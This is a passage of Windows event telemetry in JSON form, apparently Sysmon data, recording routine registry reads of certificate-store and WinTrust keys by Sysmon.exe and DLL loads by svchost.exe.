"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "samlib.dll", - "image_path": "C:\\Windows\\System32\\samlib.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 